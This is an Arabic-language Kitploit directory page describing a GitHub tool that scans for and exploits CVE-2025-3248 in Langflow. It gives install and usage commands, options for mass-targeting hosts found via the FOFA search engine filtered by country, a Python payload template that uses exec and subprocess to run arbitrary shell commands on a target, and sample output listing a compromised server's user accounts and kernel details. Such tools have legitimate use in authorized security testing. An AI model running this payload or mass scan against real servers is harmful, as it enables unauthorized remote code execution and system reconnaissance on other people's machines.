Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/xuemian168/cve-2025-3248
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالقيادة والسيطرة
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

أداة فحص للثغرات الأمنية الخاصة بـ CVE-2025-3248 في تطبيقات Langflow. أداة تُستخدم لفحص ثغرة CVE-2025-3248 في تطبيقات Langflow.

عرض المستودعالموقع الإلكتروني
1027منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

中文 | الإنجليزية

ماسح ثغرات Langflow

ماسح ثغرات لـ CVE-2025-3248 في تطبيقات Langflow.

الميزات

  • فحص هدف واحد أو أهداف متعددة باستخدام FOFA
  • تنفيذ أوامر النظام على الأهداف المعرضة للخطر
  • استرجاع معلومات النظام
  • دعم الحمولات المخصصة
  • شريط تقدم لفحص FOFA
  • واجهة CLI جميلة

التثبيت

  1. استنساخ المستودع:
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. تثبيت التبعيات:
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. تعديل ملف البيئة (اختياري)
# After you finish editing
mv .env.example .env

الاستخدام

فحص هدف واحد

python main.py -t https://target.com

استخدام FOFA API

python main.py --fofa-email [email protected] --fofa-key your_api_key

خيارات إضافية

  • -t, --target: عنوان URL للهدف المراد فحصه
  • --fofa-email: البريد الإلكتروني لـ FOFA API
  • --fofa-key: مفتاح FOFA API
  • --fofa-query: استعلام بحث FOFA (الافتراضي: 'app="LOGSPACE-LangFlow"')
  • --country: تصفية النتائج حسب رمز الدولة (مثل: CN, US)
  • --max-pages: الحد الأقصى لعدد صفحات FOFA المطلوب جلبها (الافتراضي: 5)
  • --page-size: عدد النتائج في الصفحة الواحدة (الافتراضي: 100)
  • --timeout: مهلة الطلب بالثواني (الافتراضي: 10)
  • --no-verify: تعطيل التحقق من SSL
  • --threads: عدد الخيوط للفحص المتزامن (الافتراضي: 5)
  • -f, --file: ملف Python مخصص لاستخدامه كحمولة

الحمولات المخصصة

يمكنك إنشاء حمولات مخصصة عن طريق إنشاء ملف Python:

def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

ثم استخدمها مع:

python main.py -t https://target.com -f your_payload.py

مثال على المخرجات

    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/bin                 Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

إخلاء المسؤولية

⚠️ إخلاء المسؤولية هذه الأداة مخصصة للأغراض القانونية فقط. صُممت للأغراض التعليمية، أو اختبار الأمان الداخلي للمؤسسات، أو الاستخدام في البيئات المصرح بها. يُحظر بشدة استخدام هذه الأداة على أي نظام أو شبكة أو جهاز غير مصرح به، وإلا فقد ينتهك ذلك القوانين واللوائح ذات الصلة.

يتحمل المستخدمون جميع المسؤوليات القانونية عن أفعالهم. لا يتحمل المؤلف والمساهمون أي مسؤولية عن أي خسائر أو تسرب للبيانات أو عواقب قانونية ناتجة عن الاستخدام غير السليم لهذه الأداة.

⚠️ لا تستخدمها في الهجمات غير القانونية. لا تحاول نشر أو تشغيل هذه الأداة على أنظمة غير مصرح بها.

المراجع

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

الترخيص

رخصة MIT

تنزيل الأداة